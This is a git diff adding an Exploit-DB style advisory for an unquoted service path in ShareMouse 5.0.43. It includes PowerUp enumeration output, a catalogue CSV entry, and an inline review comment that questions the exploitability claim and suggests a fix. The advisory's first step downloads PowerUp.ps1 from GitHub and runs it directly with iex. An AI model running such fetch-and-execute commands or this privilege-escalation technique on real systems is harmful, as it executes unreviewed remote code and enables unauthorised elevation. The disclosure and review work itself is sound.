diff --git a/exploits/windows/local/48794.txt b/exploits/windows/local/48794.txt
new file mode 100644
index 000000000..237f60d3c
--- /dev/null
+++ b/exploits/windows/local/48794.txt
@@ -0,0 +1,25 @@
+# Exploit Title: ShareMouse 5.0.43 - 'ShareMouse Service' Unquoted Service Path
+# Discovery Date: 2020-09-08
+# Discovery by: Alan Lacerda (alacerda)
+# Vendor Homepage: https://www.sharemouse.com/
+# Software Link: https://www.sharemouse.com/ShareMouseSetup.exe
+# Version: 5.0.43
+# Tested on OS: Microsoft Windows 10 Pro EN OS Version: 10.0.19041
+
+PS > iex (iwr https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1 -UseBasicParsing);
+PS > Invoke-AllChecks
+
+ServiceName : ShareMouse Service
+Path : C:\Program Files (x86)\ShareMouse\smService.exe
+StartName : LocalSystem
+AbuseFunction : Write-ServiceBinary -ServiceName 'ShareMouse Service' -Path
+
+PS > wmic service where 'name like "%ShareMouse%"' get DisplayName,PathName,AcceptStop,StartName
+AcceptStop DisplayName PathName StartName
+TRUE ShareMouse Service C:\Program Files (x86)\ShareMouse\smService.exe LocalSystem
+
+#Exploit:
+# A successful attempt would require the local user to be able to insert their code in the system root path
+# undetected by the OS or other security applications where it could potentially be executed during
+# application startup or reboot. If successful, the local user's code would execute with the elevated
+# privileges of the application.
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 962e8dcae..b7adb44a2 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
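Review bot: The closing `#Exploit:` paragraph of 48794.txt claims execution with the service's elevated privileges, but the PowerUp and `wmic` output above it only establishes that the PathName is unquoted, contains spaces and runs as LocalSystem. Nothing in the entry shows that a standard user can write to any directory along that path, and on a stock Windows 10 install the drive root and `Program Files (x86)` are normally not writable by non-administrators, so the practical impact depends on ACLs the write-up never checks. I would add `# Precondition: a non-admin needs write access to a directory on the service path; not verified here (no icacls output)` and `# Fix: wrap the service ImagePath in double quotes` so readers can triage and remediate. Separately, the first reproduction step pipes PowerUp.ps1 from an unpinned `master` branch straight into `iex`; the `wmic` query alone already shows the finding, so that step would be safer against a reviewed local copy or a pinned commit.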
@@ -10374,6 +10374,7 @@ id,file,description,date,author,type,platform,port
 42735,exploits/windows/local/42735.c,"Netdecision 5.8.2 - Local Privilege Escalation",2017-09-16,"Peter Baris",local,windows,
 42777,exploits/windows/local/42777.py,"CyberLink LabelPrint < 2.5 - Local Buffer Overflow (SEH Unicode)",2017-09-23,f3ci,local,windows,
 48790,exploits/windows/local/48790.txt,"Nord VPN-6.31.13.0 - 'nordvpn-service' Unquoted Service Path",2020-09-04,chipo,local,windows,
+48794,exploits/windows/local/48794.txt,"ShareMouse 5.0.43 - 'ShareMouse Service' Unquoted Service Path",2020-09-08,alacerda,local,windows,
 42887,exploits/linux/local/42887.c,"Linux Kernel 3.10.0-514.21.2.el7.x86_64 / 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable 'PIE' Local Privilege Escalation",2017-09-26,"Qualys Corporation",local,linux,
 42890,exploits/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,local,windows,
 42918,exploits/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow",2017-09-28,"Touhid M.Shaikh",local,windows,